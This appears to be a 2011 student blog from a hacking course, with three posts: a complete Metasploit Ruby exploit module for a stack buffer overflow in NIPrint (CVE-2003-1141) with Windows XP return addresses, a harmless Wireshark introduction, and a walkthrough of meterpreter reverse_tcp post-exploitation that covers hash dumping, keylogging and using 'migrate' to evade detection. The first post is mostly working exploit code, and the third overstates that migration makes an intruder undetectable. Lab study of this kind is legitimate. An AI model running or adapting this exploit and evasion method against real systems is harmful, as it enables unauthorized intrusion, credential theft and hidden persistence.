Saturday, February 26, 2011

Exploit writing for Metasploit in ruby

So today, I’m going to explain how exploits can be written as a metasploit module.
Metasploit modules are written in ruby. Even if you don’t know a lot about ruby, you should still be able to write a metasploit exploit module based on this discussion and the referencing some existing exploits available in metasploit.

Metasploit exploit module structure

A typical metasploit exploit module consists of the following components:

header and some dependencies
  • Some comments about the exploit module
  • require ‘msf/core’
class definition
includes
“def” definitions :
  • initialize
  • check (optional)
  • exploit
You can put comments in your metasploit module by using the # character.  That’s all we need to know for

now, let’s look at the steps to build a metasploit exploit module.

----------------------------------------------------------------------------------------
##
# $Id: newniprint.rb 00001 2011-02-23 20:45:00Z Malkiat $
##

##
# This exploit is created by Malkiat Singh for Week 7 Lab in course info-6012 Hacking & Exploits
# This file is created to exploit the NIPrint running on remote machine
##
            #started with some introduction to this module

require 'msf/core'         #this line is required for the core functionality

class Metasploit3 < Msf::Exploit::Remote      #inherits remote exploits properties

            include Msf::Exploit::Remote::Tcp    
# NIPrint listens on TCP, so we include remote tcp in module
           
            def initialize(info = {})
                        super(update_info(info,
                                    'Name'           =>'Modified NIPrint Exploit', 
#name shown for the exploit
                                    'Description'    =>%q{It performs a exploit of stack buffer overflow in NIPrint  service running on remote machine},
                                    'Author'         =>['Malkiat Singh'],     
#who wrote this module
                                    'License'        =>'Alone',                                 
#licensed to whom
                                    'Version'        =>'$Revision: 00001 $',           
#any revision number for this module
                                    'References'     =>[
                                                ['CVE', '2003-1141'],                                                 
                                                ['BID', '8968'],    
                                                        #further references to this exploit
                                     ],
                                    'Privileged'     => false,
                                    'Payload'        =>
                                                {
                                                            'Space'    => 500,
                                                            'BadChars' => "\x00\x0a",     
#characters breaking shell code                                 
                                                },
                                    'Platform'       => 'win',
                                    'Targets'        =>[
                                                 ['Windows XP SP0', { 'Ret' => 0x77D5B99F }],
                                                            #window sp0 return address
                                                 ['Windows XP SP3', { 'Ret' => 0x7C9D30E3 }],
                                                            #window sp3 return address
                                                ],
                                    'DefaultTarget' => 0,
#show the target to attack by default
                                    'DisclosureDate' => 'Feb 23 2011'))
                        register_options(
                                    [
                                                Opt::RPORT(515)
#default port for remote niprint set to 515
                                    ], self.class )
            end
            def exploit
                        connect            #make connection

                        req = rand_text_alphanumeric(8192) 
#generate data to send
                        req[  0, 2] = "\xeb\x33"
                        req[ 49, 4] = [target.ret].pack('V')
#putting return address to 49 position calculated from pattern_offset.rb and  discussed in previous blog
                        req[ 53, payload.encoded.length ] = payload.encoded
#shell-code after return address

                        print_status("Trying target #{target.name}...")
                        sock.put(req)                #send payload

                        handler                        #give handle to payload
                        disconnect      
            end
end

Following few screenshots show the procedure to run this exploit module:
First, find the written module using search command. This module should be placed inside ‘framework/msf3/modules/exploit’ directory. Run the metasploit and find the module.


Use the module and set options:


Set the option and run the exploit:


A session will be created and meterpreter shell is available to target the remote machine. There are number of commands to execute which you can see using help command.
Posted by at No comments:

Saturday, February 12, 2011

Wireshark-great protocol analyzer tool

Today we got curious topic about introduction to Wireshark-a powerful tool.
Wireshark is a free tool available to analyze the traffic flowing across the network. It is also there  for windows operating system and you can download it for free from the website: http://www.wireshark.org/download.html . Installation steps are few and easy to handle. This tool is not only packet sniffer, but we can do a lot more with this tool. It is a collection of utilities which help us to find the malicious activities in our network.
It can capture packets on more than one interface at a time. It differentiates packets by time, protocol, source-destination address and type of query or method used. It displays a lot of information about single packet and re-assembled packets at the destination host. It is able to interpret some attributes automatically to make the task easy for security analyst.  Also, it can police packets with their field values and displays malicious packet in alerting colors. We can store packets in backups for later review to measure the activities.
Getting familiar with this tool is not cumbersome. Try to play with the tool and much more you can explore. However, there is a good tutorial online to get help for its standard operation on website: http://www.wireshark.org/docs/
We can select interface to capture packet travelling on it and get detailed information about every packet flowing with associated Hex values. Detailed information is divided by network layers and end of all application data is appended in form of queries, answers or data. When collections of packets in a pool get gathered, then filter can help you to exclude unwanted packets by means of source, destination address or protocol. Further, we can exclude some protocols from enable protocol menu item under Analyze tab.
To conclude, Wireshark is powerful network protocol analyzer tool to help us notify about malicious activities and unauthrized packets flowing in our network.
Posted by at No comments:

Friday, February 4, 2011

Exploiting target machine using meterpreter/reverse_tcp payload

Now I am going to discuss an interesting topic related to manipulation of NIPrint on target system using meterpreter : reverse tcp handler payload.
First, we need to start the Metasploit and load payload reverse_tcp, set additional attributes like rhost, lhost from steps as we discussed in previous blog topic.
This payload tries to exploit the vulnerability on target system by putting dll file through reflective dll injection and opens back command shell to manipulate the target for attacker.
When the exploit gets successfully executed, attackers can use any command from a list of commands to compromise the target. It can be getting process identifier of processes, dumping hashes of passwords, escalating privileges, hiding current session in another process, starting keystroke logger and many more.
You can find a list of commands to execute using ‘help’ command. Number of core commands, file system commands etc. get listed on the shell window.
Important thing is once you opened a session by exploiting NIPrint, you can hide your attack using ‘migrate’ command in different process. Your exploit cannot be detected as current session got associated with a different process. You can continue to manipulate the target, but no detection system can detect your presence on target system. Migrating from one process to another helps in continuing the exploit even when applications open and close quickly.
I hope this information may be helpful a lot.
Posted by at 2 comments:
Subscribe to: Posts (Atom)